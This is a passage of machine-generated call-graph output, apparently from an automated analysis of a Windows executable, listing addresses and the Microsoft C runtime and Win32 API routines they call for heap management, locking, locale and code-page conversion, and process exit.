LeaveCriticalSection 14191->14427 14193 40e334 14193->14169 14195 4104e9 __decode_pointer 6 API calls 14194->14195 14196 40d2f3 14195->14196 14196->14169 14211 410564 TlsGetValue 14197->14211 14200 410729 SetLastError 14200->14174 14201 411cba __calloc_crt 60 API calls 14202 4106e7 14201->14202 14202->14200 14203 4104e9 __decode_pointer 6 API calls 14202->14203 14204 410701 14203->14204 14205 410720 14204->14205 14206 410708 14204->14206 14216 40b6b5 14205->14216 14207 4105d5 __initptd 60 API calls 14206->14207 14210 410710 GetCurrentThreadId 14207->14210 14209 410726 14209->14200 14210->14200 14212 410594 14211->14212 14213 410579 14211->14213 14212->14200 14212->14201 14214 4104e9 __decode_pointer 6 API calls 14213->14214 14215 410584 TlsSetValue 14214->14215 14215->14212 14217 40b6c1 ___lock_fhandle 14216->14217 14218 40b73d ___lock_fhandle 14217->14218 14219 40b714 HeapFree 14217->14219 14218->14209 14219->14218 14220 40b727 14219->14220 14221 40bfc1 ___strgtold12_l 62 API calls 14220->14221 14221->14218 14223 40d629 ___lock_fhandle 14222->14223 14224 40d64f 14223->14224 14248 40ec4d 14223->14248 14232 40d65f ___lock_fhandle 14224->14232 14294 411c75 14224->14294 14230 40d680 14235 40d6e0 __lock 63 API calls 14230->14235 14231 40d671 14234 40bfc1 ___strgtold12_l 63 API calls 14231->14234 14232->14182 14234->14232 14237 40d687 14235->14237 14238 40d6bb 14237->14238 14239 40d68f 14237->14239 14240 40b6b5 __crtGetStringTypeA_stat 63 API calls 14238->14240 14241 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 14239->14241 14242 40d6ac 14240->14242 14243 40d69a 14241->14243 14300 40d6d7 14242->14300 14243->14242 14245 40b6b5 __crtGetStringTypeA_stat 63 API calls 14243->14245 14246 40d6a6 14245->14246 14247 40bfc1 ___strgtold12_l 63 API calls 14246->14247 14247->14242 14303 413d5b 14248->14303 14251 413d5b __set_error_mode 63 API calls 14254 40ec61 14251->14254 14252 40eaa2 __NMSG_WRITE 63 API calls 14253 40ec79 14252->14253 14255 40eaa2 __NMSG_WRITE 63 API calls 14253->14255 14254->14252 14256 40d63e 14254->14256 14255->14256 14257 40eaa2 14256->14257 14258 40eab6 14257->14258 14259 413d5b __set_error_mode 60 API calls 14258->14259 14290 40d645 14258->14290 14260 40ead8 14259->14260 14261 40ec16 GetStdHandle 14260->14261 14263 413d5b __set_error_mode 60 API calls 14260->14263 14262 40ec24 _strlen 14261->14262 14261->14290 14266 40ec3d WriteFile 14262->14266 14262->14290 14264 40eae9 14263->14264 14264->14261 14265 40eafb 14264->14265 14265->14290 14309 40ef42 14265->14309 14266->14290 14269 40eb31 GetModuleFileNameA 14271 40eb4f 14269->14271 14276 40eb72 _strlen 14269->14276 14273 40ef42 _strcpy_s 60 API calls 14271->14273 14274 40eb5f 14273->14274 14275 40e61c __invoke_watson 10 API calls 14274->14275 14274->14276 14275->14276 14287 40ebb5 14276->14287 14325 411da6 14276->14325 14281 40ebd9 14283 413ce7 _strcat_s 60 API calls 14281->14283 14282 40e61c __invoke_watson 10 API calls 14282->14281 14284 40ebed 14283->14284 14286 40ebfe 14284->14286 14288 40e61c __invoke_watson 10 API calls 14284->14288 14285 40e61c __invoke_watson 10 API calls 14285->14287 14343 413b7e 14286->14343 14334 413ce7 14287->14334 14288->14286 14291 40e7ee 14290->14291 14381 40e7c3 GetModuleHandleW 14291->14381 14297 411c7e 14294->14297 14296 40d66a 14296->14230 14296->14231 14297->14296 14298 411c95 Sleep 14297->14298 14385 40b84d 14297->14385 14299 411caa 14298->14299 14299->14296 14299->14297 14415 40d606 LeaveCriticalSection 14300->14415 14302 40d6de 14302->14232 14304 413d6a 14303->14304 14305 40ec54 14304->14305 14306 40bfc1 ___strgtold12_l 63 API calls 14304->14306 14305->14251 14305->14254 14307 413d8d 14306->14307 14308 40e744 ___strgtold12_l 6 API calls 14307->14308 14308->14305 14310 40ef53 14309->14310 14312 40ef5a 14309->14312 14310->14312 14314 40ef80 14310->14314 14311 40bfc1 ___strgtold12_l 63 API calls 14313 40ef5f 14311->14313 14312->14311 14315 40e744 ___strgtold12_l 6 API calls 14313->14315 14316 40eb1d 14314->14316 14317 40bfc1 ___strgtold12_l 63 API calls 14314->14317 14315->14316 14316->14269 14318 40e61c 14316->14318 14317->14313 14370 40ba30 14318->14370 14320 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14321 40e725 GetCurrentProcess TerminateProcess 14320->14321 14322 40e719 __invoke_watson 14320->14322 14372 40ce09 14321->14372 14322->14321 14324 40e742 14324->14269 14327 411db8 14325->14327 14326 40eba2 14326->14285 14326->14287 14327->14326 14330 411dbc 14327->14330 14332 411e02 14327->14332 14328 40bfc1 ___strgtold12_l 63 API calls 14329 411dd8 14328->14329 14331 40e744 ___strgtold12_l 6 API calls 14329->14331 14330->14326 14330->14328 14331->14326 14332->14326 14333 40bfc1 ___strgtold12_l 63 API calls 14332->14333 14333->14329 14335 413cff 14334->14335 14337 413cf8 14334->14337 14336 40bfc1 ___strgtold12_l 63 API calls 14335->14336 14342 413d04 14336->14342 14337->14335 14339 413d33 14337->14339 14338 40e744 ___strgtold12_l 6 API calls 14340 40ebc8 14338->14340 14339->14340 14341 40bfc1 ___strgtold12_l 63 API calls 14339->14341 14340->14281 14340->14282 14341->14342 14342->14338 14344 4104e0 ___crtMessageBoxW 6 API calls 14343->14344 14345 413b8e 14344->14345 14346 413ba1 LoadLibraryA 14345->14346 14348 413c29 14345->14348 14347 413bb6 GetProcAddress 14346->14347 14350 413ccb 14346->14350 14349 413bcc 14347->14349 14347->14350 14352 4104e9 __decode_pointer 6 API calls 14348->14352 14366 413c53 14348->14366 14353 41046e __encode_pointer 6 API calls 14349->14353 14350->14290 14351 413c7e 14354 4104e9 __decode_pointer 6 API calls 14351->14354 14356 413c46 14352->14356 14357 413bd2 GetProcAddress 14353->14357 14354->14350 14355 4104e9 __decode_pointer 6 API calls 14363 413c96 14355->14363 14358 4104e9 __decode_pointer 6 API calls 14356->14358 14359 41046e __encode_pointer 6 API calls 14357->14359 14358->14366 14360 413be7 GetProcAddress 14359->14360 14361 41046e __encode_pointer 6 API calls 14360->14361 14362 413bfc GetProcAddress 14361->14362 14364 41046e __encode_pointer 6 API calls 14362->14364 14363->14351 14365 4104e9 __decode_pointer 6 API calls 14363->14365 14367 413c11 14364->14367 14365->14351 14366->14351 14366->14355 14367->14348 14368 413c1b GetProcAddress 14367->14368 14369 41046e __encode_pointer 6 API calls 14368->14369 14369->14348 14371 40ba3c __VEC_memzero 14370->14371 14371->14320 14373 40ce11 14372->14373 14374 40ce13 IsDebuggerPresent 14372->14374 14373->14324 14380 4138fc 14374->14380 14377 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 14378 413723 __invoke_watson 14377->14378 14379 41372b GetCurrentProcess TerminateProcess 14377->14379 14378->14379 14379->14324 14380->14377 14382 40e7d7 GetProcAddress 14381->14382 14383 40e7ec ExitProcess 14381->14383 14382->14383 14384 40e7e7 CorExitProcess 14382->14384 14384->14383 14386 40b900 14385->14386 14387 40b85f 14385->14387 14388 40d2e3 _malloc 6 API calls 14386->14388 14394 40b8bc RtlAllocateHeap 14387->14394 14396 40b870 14387->14396 14397 40b8ec 14387->14397 14399 40d2e3 _malloc 6 API calls 14387->14399 14400 40b8f1 14387->14400 14402 40b8f8 14387->14402 14403 40b7fe 14387->14403 14389 40b906 14388->14389 14391 40bfc1 ___strgtold12_l 62 API calls 14389->14391 14390 40ec4d __FF_MSGBANNER 62 API calls 14390->14396 14391->14402 14393 40eaa2 __NMSG_WRITE 62 API calls 14393->14396 14394->14387 14395 40e7ee _malloc 4 API calls 14395->14396 14396->14387 14396->14390 14396->14393 14396->14395 14398 40bfc1 ___strgtold12_l 62 API calls 14397->14398 14398->14400 14399->14387 14401 40bfc1 ___strgtold12_l 62 API calls 14400->14401 14401->14402 14402->14297 14404 40b80a ___lock_fhandle 14403->14404 14405 40b83b ___lock_fhandle 14404->14405 14406 40d6e0 __lock 63 API calls 14404->14406 14405->14387 14407 40b820 14406->14407 14408 40def2 ___sbh_alloc_block 5 API calls 14407->14408 14409 40b82b 14408->14409 14411 40b844 14409->14411 14414 40d606 LeaveCriticalSection 14411->14414 14413 40b84b 14413->14405 14414->14413 14415->14302 14417 40daa0 HeapAlloc 14416->14417 14418 40da6c HeapReAlloc 14416->14418 14419 40dac3 VirtualAlloc 14417->14419 14420 40da8a 14417->14420 14418->14420 14421 40da8e 14418->14421 14419->14420 14422 40dadd HeapFree 14419->14422 14420->14190 14421->14417 14422->14420 14424 40db20 VirtualAlloc 14423->14424 14426 40db67 14424->14426 14426->14189 14427->14193 14428->14126 14447 40d606 LeaveCriticalSection 14429->14447 14431 41066c 14431->14136 14433 4145f0 InterlockedIncrement 14432->14433 14434 4145f3 14432->14434 14433->14434 14435 414600 14434->14435 14436 4145fd InterlockedIncrement 14434->14436 14437 41460a InterlockedIncrement 14435->14437 14438 41460d 14435->14438 14436->14435 14437->14438 14439 414617 InterlockedIncrement 14438->14439 14441 41461a 14438->14441 14439->14441 14440 414633 InterlockedIncrement 14440->14441 14441->14440 14442 41464e InterlockedIncrement 14441->14442 14443 414643 InterlockedIncrement 14441->14443 14442->14139 14443->14441 14448 40d606 LeaveCriticalSection 14444->14448 14446 4106ba 14446->14141 14447->14431 14448->14446 14449->13938 14452 41265c 14450->14452 14454 4126c9 14452->14454 14460 416836 14452->14460 14453 4127c7 14453->13982 14453->13984 14454->14453 14455 416836 73 API calls _parse_cmdline 14454->14455 14455->14454 14457 414474 14456->14457 14458 41447b 14456->14458 14682 4142d1 14457->14682 14458->13977 14463 4167e3 14460->14463 14466 40ec86 14463->14466 14467 40ec99 14466->14467 14471 40ece6 14466->14471 14474 410735 14467->14474 14470 40ecc6 14470->14471 14494 413fcc 14470->14494 14471->14452 14475 4106bc __getptd_noexit 63 API calls 14474->14475 14476 41073d 14475->14476 14477 40ec9e 14476->14477 14478 40e79a __amsg_exit 63 API calls 14476->14478 14477->14470 14479 414738 14477->14479 14478->14477 14480 414744 ___lock_fhandle 14479->14480 14481 410735 __getptd 63 API calls 14480->14481 14482 414749 14481->14482 14483 414777 14482->14483 14485 41475b 14482->14485 14484 40d6e0 __lock 63 API calls 14483->14484 14486 41477e 14484->14486 14487 410735 __getptd 63 API calls 14485->14487 14510 4146fa 14486->14510 14489 414760 14487->14489 14491 41476e ___lock_fhandle 14489->14491 14493 40e79a __amsg_exit 63 API calls 14489->14493 14491->14470 14493->14491 14495 413fd8 ___lock_fhandle 14494->14495 14496 410735 __getptd 63 API calls 14495->14496 14497 413fdd 14496->14497 14498 40d6e0 __lock 63 API calls 14497->14498 14499 413fef 14497->14499 14500 41400d 14498->14500 14502 413ffd ___lock_fhandle 14499->14502 14504 40e79a __amsg_exit 63 API calls 14499->14504 14501 414056 14500->14501 14505 414024 InterlockedDecrement 14500->14505 14506 41403e InterlockedIncrement 14500->14506 14678 414067 14501->14678 14502->14471 14504->14502 14505->14506 14507 41402f 14505->14507 14506->14501 14507->14506 14508 40b6b5 __crtGetStringTypeA_stat 63 API calls 14507->14508 14509 41403d 14508->14509 14509->14506 14511 4146fe 14510->14511 14517 414730 14510->14517 14512 4145d2 ___addlocaleref 8 API calls 14511->14512 14511->14517 14513 414711 14512->14513 14513->14517 14521 414661 14513->14521 14518 4147a2 14517->14518 14677 40d606 LeaveCriticalSection 14518->14677 14520 4147a9 14520->14489 14522 414672 InterlockedDecrement 14521->14522 14523 4146f5 14521->14523 14524 414687 InterlockedDecrement 14522->14524 14525 41468a 14522->14525 14523->14517 14535 414489 14523->14535 14524->14525 14526 414694 InterlockedDecrement 14525->14526 14527 414697 14525->14527 14526->14527 14528 4146a1 InterlockedDecrement 14527->14528 14529 4146a4 14527->14529 14528->14529 14530 4146b1 14529->14530 14531 4146ae InterlockedDecrement 14529->14531 14532 4146ca InterlockedDecrement 14530->14532 14533 4146da InterlockedDecrement 14530->14533 14534 4146e5 InterlockedDecrement 14530->14534 14531->14530 14532->14530 14533->14530 14534->14523 14536 41450d 14535->14536 14545 4144a0 14535->14545 14537 40b6b5 __crtGetStringTypeA_stat 63 API calls 14536->14537 14538 41455a 14536->14538 14539 41452e 14537->14539 14552 414581 14538->14552 14589 417667 14538->14589 14541 40b6b5 __crtGetStringTypeA_stat 63 API calls 14539->14541 14546 414541 14541->14546 14542 4144d4 14543 4144f5 14542->14543 14556 40b6b5 __crtGetStringTypeA_stat 63 API calls 14542->14556 14547 40b6b5 __crtGetStringTypeA_stat 63 API calls 14543->14547 14545->14536 14545->14542 14550 40b6b5 __crtGetStringTypeA_stat 63 API calls 14545->14550 14554 40b6b5 __crtGetStringTypeA_stat 63 API calls 14546->14554 14557 414502 14547->14557 14548 4145c6 14551 40b6b5 __crtGetStringTypeA_stat 63 API calls 14548->14551 14549 40b6b5 __crtGetStringTypeA_stat 63 API calls 14549->14552 14553 4144c9 14550->14553 14558 4145cc 14551->14558 14552->14548 14555 40b6b5 63 API calls __crtGetStringTypeA_stat 14552->14555 14565 417841 14553->14565 14560 41454f 14554->14560 14555->14552 14561 4144ea 14556->14561 14562 40b6b5 __crtGetStringTypeA_stat 63 API calls 14557->14562 14558->14517 14563 40b6b5 __crtGetStringTypeA_stat 63 API calls 14560->14563 14581 4177fc 14561->14581 14562->14536 14563->14538 14566 4178cb 14565->14566 14567 41784e 14565->14567 14566->14542 14568 41785f 14567->14568 14569 40b6b5 __crtGetStringTypeA_stat 63 API calls 14567->14569 14570 417871 14568->14570 14571 40b6b5 __crtGetStringTypeA_stat 63 API calls 14568->14571 14569->14568 14572 417883 14570->14572 14573 40b6b5 __crtGetStringTypeA_stat 63 API calls 14570->14573 14571->14570 14574 417895 14572->14574 14576 40b6b5 __crtGetStringTypeA_stat 63 API calls 14572->14576 14573->14572 14575 4178a7 14574->14575 14577 40b6b5 __crtGetStringTypeA_stat 63 API calls 14574->14577 14578 4178b9 14575->14578 14579 40b6b5 __crtGetStringTypeA_stat 63 API calls 14575->14579 14576->14574 14577->14575 14578->14566 14580 40b6b5 __crtGetStringTypeA_stat 63 API calls 14578->14580 14579->14578 14580->14566 14582 417809 14581->14582 14588 41783d 14581->14588 14583 417819 14582->14583 14584 40b6b5 __crtGetStringTypeA_stat 63 API calls 14582->14584 14585 41782b 14583->14585 14586 40b6b5 __crtGetStringTypeA_stat 63 API calls 14583->14586 14584->14583 14587 40b6b5 __crtGetStringTypeA_stat 63 API calls 14585->14587 14585->14588 14586->14585 14587->14588 14588->14543 14590 417678 14589->14590 14676 41457a 14589->14676 14591 40b6b5 __crtGetStringTypeA_stat 63 API calls 14590->14591 14592 417680 14591->14592 14593 40b6b5 __crtGetStringTypeA_stat 63 API calls 14592->14593 14594 417688 14593->14594 14595 40b6b5 __crtGetStringTypeA_stat 63 API calls 14594->14595 14596 417690 14595->14596 14597 40b6b5 __crtGetStringTypeA_stat 63 API calls 14596->14597 14598 417698 14597->14598 14599 40b6b5 __crtGetStringTypeA_stat 63 API calls 14598->14599 14600 4176a0 14599->14600 14601 40b6b5 __crtGetStringTypeA_stat 63 API calls 14600->14601 14602 4176a8 14601->14602 14603 40b6b5 __crtGetStringTypeA_stat 63 API calls 14602->14603 14604 4176af 14603->14604 14605 40b6b5 __crtGetStringTypeA_stat 63 API calls 14604->14605 14606 4176b7 14605->14606 14607 40b6b5 __crtGetStringTypeA_stat 63 API calls 14606->14607 14608 4176bf 14607->14608 14609 40b6b5 __crtGetStringTypeA_stat 63 API calls 14608->14609 14610 4176c7 14609->14610 14611 40b6b5 __crtGetStringTypeA_stat 63 API calls 14610->14611 14612 4176cf 14611->14612 14613 40b6b5 __crtGetStringTypeA_stat 63 API calls 14612->14613 14614 4176d7 14613->14614 14615 40b6b5 __crtGetStringTypeA_stat 63 API calls 14614->14615 14616 4176df 14615->14616 14617 40b6b5 __crtGetStringTypeA_stat 63 API calls 14616->14617 14618 4176e7 14617->14618 14619 40b6b5 __crtGetStringTypeA_stat 63 API calls 14618->14619 14620 4176ef 14619->14620 14621 40b6b5 __crtGetStringTypeA_stat 63 API calls 14620->14621 14622 4176f7 14621->14622 14623 40b6b5 __crtGetStringTypeA_stat 63 API calls 14622->14623 14624 417702 14623->14624 14625 40b6b5 __crtGetStringTypeA_stat 63 API calls 14624->14625 14626 41770a 14625->14626 14627 40b6b5 __crtGetStringTypeA_stat 63 API calls 14626->14627 14628 417712 14627->14628 14629 40b6b5 __crtGetStringTypeA_stat 63 API calls 14628->14629 14630 41771a 14629->14630 14631 40b6b5 __crtGetStringTypeA_stat 63 API calls 14630->14631 14632 417722 14631->14632 14633 40b6b5 __crtGetStringTypeA_stat 63 API calls 14632->14633 14634 41772a 14633->14634 14635 40b6b5 __crtGetStringTypeA_stat 63 API calls 14634->14635 14636 417732 14635->14636 14637 40b6b5 __crtGetStringTypeA_stat 63 API calls 14636->14637 14638 41773a 14637->14638 14639 40b6b5 __crtGetStringTypeA_stat 63 API calls 14638->14639 14640 417742 14639->14640 14641 40b6b5 __crtGetStringTypeA_stat 63 API calls 14640->14641 14642 41774a 14641->14642 14643 40b6b5 __crtGetStringTypeA_stat 63 API calls 14642->14643 14644 417752 14643->14644 14645 40b6b5 __crtGetStringTypeA_stat 63 API calls 14644->14645 14646 41775a 14645->14646 14647 40b6b5 __crtGetStringTypeA_stat 63 API calls 14646->14647 14648 417762 14647->14648 14649 40b6b5 __crtGetStringTypeA_stat 63 API calls 14648->14649 14650 41776a 14649->14650 14651 40b6b5 __crtGetStringTypeA_stat 63 API calls 14650->14651 14652 417772 14651->14652 14653 40b6b5 __crtGetStringTypeA_stat 63 API calls 14652->14653 14654 41777a 14653->14654 14655 40b6b5 __crtGetStringTypeA_stat 63 API calls 14654->14655 14656 417788 14655->14656 14657 40b6b5 __crtGetStringTypeA_stat 63 API calls 14656->14657 14658 417793 14657->14658 14659 40b6b5 __crtGetStringTypeA_stat 63 API calls 14658->14659 14660 41779e 14659->14660 14661 40b6b5 __crtGetStringTypeA_stat 63 API calls 14660->14661 14662 4177a9 14661->14662 14663 40b6b5 __crtGetStringTypeA_stat 63 API calls 14662->14663 14664 4177b4 14663->14664 14665 40b6b5 __crtGetStringTypeA_stat 63 API calls 14664->14665 14666 4177bf 14665->14666 14667 40b6b5 __crtGetStringTypeA_stat 63 API calls 14666->14667 14668 4177ca 14667->14668 14669 40b6b5 __crtGetStringTypeA_stat 63 API calls 14668->14669 14670 4177d5 14669->14670 14671 40b6b5 __crtGetStringTypeA_stat 63 API calls 14670->14671 14672 4177e0 14671->14672 14673 40b6b5 __crtGetStringTypeA_stat 63 API calls 14672->14673 14674 4177eb 14673->14674 14675 40b6b5 __crtGetStringTypeA_stat 63 API calls 14674->14675 14675->14676 14676->14549 14677->14520 14681 40d606 LeaveCriticalSection 14678->14681 14680 41406e 14680->14499 14681->14680 14683 4142dd ___lock_fhandle 14682->14683 14684 410735 __getptd 63 API calls 14683->14684 14685 4142e6 14684->14685 14686 413fcc __setmbcp 65 API calls 14685->14686 14687 4142f0 14686->14687 14713 414070 14687->14713 14690 411c75 __malloc_crt 63 API calls 14692 414311 14690->14692 14691 414430 ___lock_fhandle 14691->14458 14692->14691 14720 4140ec 14692->14720 14695 414341 InterlockedDecrement 14697 414351 14695->14697 14698 414362 InterlockedIncrement 14695->14698 14696 41443d 14696->14691 14699 414450 14696->14699 14701 40b6b5 __crtGetStringTypeA_stat 63 API calls 14696->14701 14697->14698 14703 40b6b5 __crtGetStringTypeA_stat 63 API calls 14697->14703 14698->14691 14700 414378 14698->14700 14702 40bfc1 ___strgtold12_l 63 API calls 14699->14702 14700->14691 14705 40d6e0 __lock 63 API calls 14700->14705 14701->14699 14702->14691 14704 414361 14703->14704 14704->14698 14707 41438c InterlockedDecrement 14705->14707 14708 414408 14707->14708 14709 41441b InterlockedIncrement 14707->14709 14708->14709 14711 40b6b5 __crtGetStringTypeA_stat 63 API calls 14708->14711 14730 414432 14709->14730 14712 41441a 14711->14712 14712->14709 14714 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14713->14714 14715 414084 14714->14715 14716 4140ad 14715->14716 14717 41408f GetOEMCP 14715->14717 14718 4140b2 GetACP 14716->14718 14719 41409f 14716->14719 14717->14719 14718->14719 14719->14690 14719->14691 14721 414070 getSystemCP 75 API calls 14720->14721 14722 41410c 14721->14722 14723 414117 setSBCS 14722->14723 14726 41415b IsValidCodePage 14722->14726 14729 414180 _memset __setmbcp_nolock 14722->14729 14724 40ce09 ___strgtold12_l 5 API calls 14723->14724 14725 4142cf 14724->14725 14725->14695 14725->14696 14726->14723 14727 41416d GetCPInfo 14726->14727 14727->14723 14727->14729 14733 413e39 GetCPInfo 14729->14733 14866 40d606 LeaveCriticalSection 14730->14866 14732 414439 14732->14691 14734 413f1f 14733->14734 14735 413e6d _memset 14733->14735 14739 40ce09 ___strgtold12_l 5 API calls 14734->14739 14743 417625 14735->14743 14741 413fca 14739->14741 14741->14729 14742 417426 ___crtLCMapStringA 98 API calls 14742->14734 14744 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14743->14744 14745 417638 14744->14745 14753 41746b 14745->14753 14748 417426 14749 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14748->14749 14750 417439 14749->14750 14819 417081 14750->14819 14754 4174b7 14753->14754 14755 41748c GetStringTypeW 14753->14755 14756 41759e 14754->14756 14757 4174a4 14754->14757 14755->14757 14758 4174ac GetLastError 14755->14758 14781 417a20 GetLocaleInfoA 14756->14781 14759 4174f0 MultiByteToWideChar 14757->14759 14769 417598 14757->14769 14758->14754 14763 41751d 14759->14763 14759->14769 14761 40ce09 ___strgtold12_l 5 API calls 14762 413eda 14761->14762 14762->14748 14766 40b84d _malloc 63 API calls 14763->14766 14776 417532 _memset __crtGetStringTypeA_stat 14763->14776 14765 4175ef GetStringTypeA 14765->14769 14770 41760a 14765->14770 14766->14776 14768 41756b MultiByteToWideChar 14772 417581 GetStringTypeW 14768->14772 14773 417592 14768->14773 14769->14761 14774 40b6b5 __crtGetStringTypeA_stat 63 API calls 14770->14774 14772->14773 14777 4147ae 14773->14777 14774->14769 14776->14768 14776->14769 14778 4147cb 14777->14778 14779 4147ba 14777->14779 14778->14769 14779->14778 14780 40b6b5 __crtGetStringTypeA_stat 63 API calls 14779->14780 14780->14778 14782 417a53 14781->14782 14783 417a4e 14781->14783 14812 416f54 14782->14812 14785 40ce09 ___strgtold12_l 5 API calls 14783->14785 14786 4175c2 14785->14786 14786->14765 14786->14769 14787 417a69 14786->14787 14788 417aa9 GetCPInfo 14787->14788 14789 417b33 14787->14789 14790 417ac0 14788->14790 14791 417b1e MultiByteToWideChar 14788->14791 14792 40ce09 ___strgtold12_l 5 API calls 14789->14792 14790->14791 14793 417ac6 GetCPInfo 14790->14793 14791->14789 14796 417ad9 _strlen 14791->14796 14794 4175e3 14792->14794 14793->14791 14795 417ad3 14793->14795 14794->14765 14794->14769 14795->14791 14795->14796 14797 40b84d _malloc 63 API calls 14796->14797 14801 417b0b _memset __crtGetStringTypeA_stat 14796->14801 14797->14801 14798 417b68 MultiByteToWideChar 14799 417b80 14798->14799 14800 417b9f 14798->14800 14803 417ba4 14799->14803 14804 417b87 WideCharToMultiByte 14799->14804 14802 4147ae __freea 63 API calls 14800->14802 14801->14789 14801->14798 14802->14789 14805 417bc3 14803->14805 14806 417baf WideCharToMultiByte 14803->14806 14804->14800 14807 411cba __calloc_crt 63 API calls 14805->14807 14806->14800 14806->14805 14808 417bcb 14807->14808 14808->14800 14809 417bd4 WideCharToMultiByte 14808->14809 14809->14800 14810 417be6 14809->14810 14811 40b6b5 __crtGetStringTypeA_stat 63 API calls 14810->14811 14811->14800 14815 41a354 14812->14815 14816 41a36d 14815->14816 14817 41a125 strtoxl 87 API calls 14816->14817 14818 416f65 14817->14818 14818->14783 14820 4170a2 LCMapStringW 14819->14820 14823 4170bd 14819->14823 14821 4170c5 GetLastError 14820->14821 14820->14823 14821->14823 14822 4172bb 14826 417a20 ___ansicp 87 API calls 14822->14826 14823->14822 14824 417117 14823->14824 14825 417130 MultiByteToWideChar 14824->14825 14840 4172b2 14824->14840 14834 41715d 14825->14834 14825->14840 14827 4172e3 14826->14827 14830 4173d7 LCMapStringA 14827->14830 14831 4172fc 14827->14831 14827->14840 14828 40ce09 ___strgtold12_l 5 API calls 14829 413efa 14828->14829 14829->14742 14846 417333 14830->14846 14832 417a69 ___convertcp 70 API calls 14831->14832 14836 41730e 14832->14836 14833 4171ae MultiByteToWideChar 14837 4171c7 LCMapStringW 14833->14837 14838 4172a9 14833->14838 14835 40b84d _malloc 63 API calls 14834->14835 14845 417176 __crtGetStringTypeA_stat 14834->14845 14835->14845 14836->14840 14842 417318 LCMapStringA 14836->14842 14837->14838 14844 4171e8 14837->14844 14843 4147ae __freea 63 API calls 14838->14843 14839 40b6b5 __crtGetStringTypeA_stat 63 API calls 14841 4173fe 14839->14841 14840->14828 14841->14840 14848 40b6b5 __crtGetStringTypeA_stat 63 API calls 14841->14848 14842->14846 14851 41733a 14842->14851 14843->14840 14847 4171f1 14844->14847 14850 41721a 14844->14850 14845->14833 14845->14840 14846->14839 14846->14841 14847->14838 14849 417203 LCMapStringW 14847->14849 14848->14840 14849->14838 14856 417235 __crtGetStringTypeA_stat 14850->14856 14858 40b84d _malloc 63 API calls 14850->14858 14853 40b84d _malloc 63 API calls 14851->14853 14857 41734b _memset __crtGetStringTypeA_stat 14851->14857 14852 417269 LCMapStringW 14854 417281 WideCharToMultiByte 14852->14854 14855 4172a3 14852->14855 14853->14857 14854->14855 14859 4147ae __freea 63 API calls 14855->14859 14856->14838 14856->14852 14857->14846 14860 417389 LCMapStringA 14857->14860 14858->14856 14859->14838 14862 4173a5 14860->14862 14863 4173a9 14860->14863 14865 4147ae __freea 63 API calls 14862->14865 14864 417a69 ___convertcp 70 API calls 14863->14864 14864->14862 14865->14846 14866->14732 14868 41358c 14867->14868 14869 41046e __encode_pointer 6 API calls 14868->14869 14870 4135a4 14868->14870 14869->14868 14870->14005 14874 40d281 14871->14874 14873 40d2ca 14873->14007 14875 40d28d ___lock_fhandle 14874->14875 14882 40e806 14875->14882 14881 40d2ae ___lock_fhandle 14881->14873 14883 40d6e0 __lock 63 API calls 14882->14883 14884 40d292 14883->14884 14885 40d196 14884->14885 14886 4104e9 __decode_pointer 6 API calls 14885->14886 14887 40d1aa 14886->14887 14888 4104e9 __decode_pointer 6 API calls 14887->14888 14889 40d1ba 14888->14889 14897 40d23d 14889->14897 14905 40e56a 14889->14905 14891 40d1d8 14896 40d1fc 14891->14896 14901 40d224 14891->14901 14918 411d06 14891->14918 14892 41046e __encode_pointer 6 API calls 14893 40d232 14892->14893 14894 41046e __encode_pointer 6 API calls 14893->14894 14894->14897 14896->14897 14898 411d06 __realloc_crt 73 API calls 14896->14898 14899 40d212 14896->14899 14902 40d2b7 14897->14902 14898->14899 14899->14897 14900 41046e __encode_pointer 6 API calls 14899->14900 14900->14901 14901->14892 14967 40e80f 14902->14967 14906 40e576 ___lock_fhandle 14905->14906 14907 40e5a3 14906->14907 14908 40e586 14906->14908 14910 40e5e4 HeapSize 14907->14910 14912 40d6e0 __lock 63 API calls 14907->14912 14909 40bfc1 ___strgtold12_l 63 API calls 14908->14909 14911 40e58b 14909->14911 14914 40e59b ___lock_fhandle 14910->14914 14913 40e744 ___strgtold12_l 6 API calls 14911->14913 14915 40e5b3 ___sbh_find_block 14912->14915 14913->14914 14914->14891 14923 40e604 14915->14923 14920 411d0f 14918->14920 14921 411d4e 14920->14921 14922 411d2f Sleep 14920->14922 14927 40e34f 14920->14927 14921->14896 14922->14920 14926 40d606 LeaveCriticalSection 14923->14926 14925 40e5df 14925->14910 14925->14914 14926->14925 14928 40e35b ___lock_fhandle 14927->14928 14929 40e370 14928->14929 14930 40e362 14928->14930 14932 40e383 14929->14932 14933 40e377 14929->14933 14931 40b84d _malloc 63 API calls 14930->14931 14948 40e36a ___lock_fhandle __dosmaperr 14931->14948 14940 40e4f5 14932->14940 14960 40e390 _realloc ___sbh_resize_block ___sbh_find_block 14932->14960 14934 40b6b5 __crtGetStringTypeA_stat 63 API calls 14933->14934 14934->14948 14935 40e528 14936 40d2e3 _malloc 6 API calls 14935->14936 14939 40e52e 14936->14939 14937 40d6e0 __lock 63 API calls 14937->14960 14938 40e4fa HeapReAlloc 14938->14940 14938->14948 14941 40bfc1 ___strgtold12_l 63 API calls 14939->14941 14940->14935 14940->14938 14942 40e54c 14940->14942 14943 40d2e3 _malloc 6 API calls 14940->14943 14946 40e542 14940->14946 14941->14948 14944 40bfc1 ___strgtold12_l 63 API calls 14942->14944 14942->14948 14943->14940 14947 40e555 GetLastError 14944->14947 14949 40bfc1 ___strgtold12_l 63 API calls 14946->14949 14947->14948 14948->14920 14951 40e4c3 14949->14951 14950 40e41b HeapAlloc 14950->14960 14951->14948 14953 40e4c8 GetLastError 14951->14953 14952 40e470 HeapReAlloc 14952->14960 14953->14948 14954 40def2 ___sbh_alloc_block 5 API calls 14954->14960 14955 40e4db 14955->14948 14957 40bfc1 ___strgtold12_l 63 API calls 14955->14957 14956 40d2e3 _malloc 6 API calls 14956->14960 14958 40e4e8 14957->14958 14958->14947 14958->14948 14959 40e4be 14961 40bfc1 ___strgtold12_l 63 API calls 14959->14961 14960->14935 14960->14937 14960->14948 14960->14950 14960->14952 14960->14954 14960->14955 14960->14956 14960->14959 14962 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 14960->14962 14963 40e493 14960->14963 14961->14951 14962->14960 14966 40d606 LeaveCriticalSection 14963->14966 14965 40e49a 14965->14960 14966->14965 14970 40d606 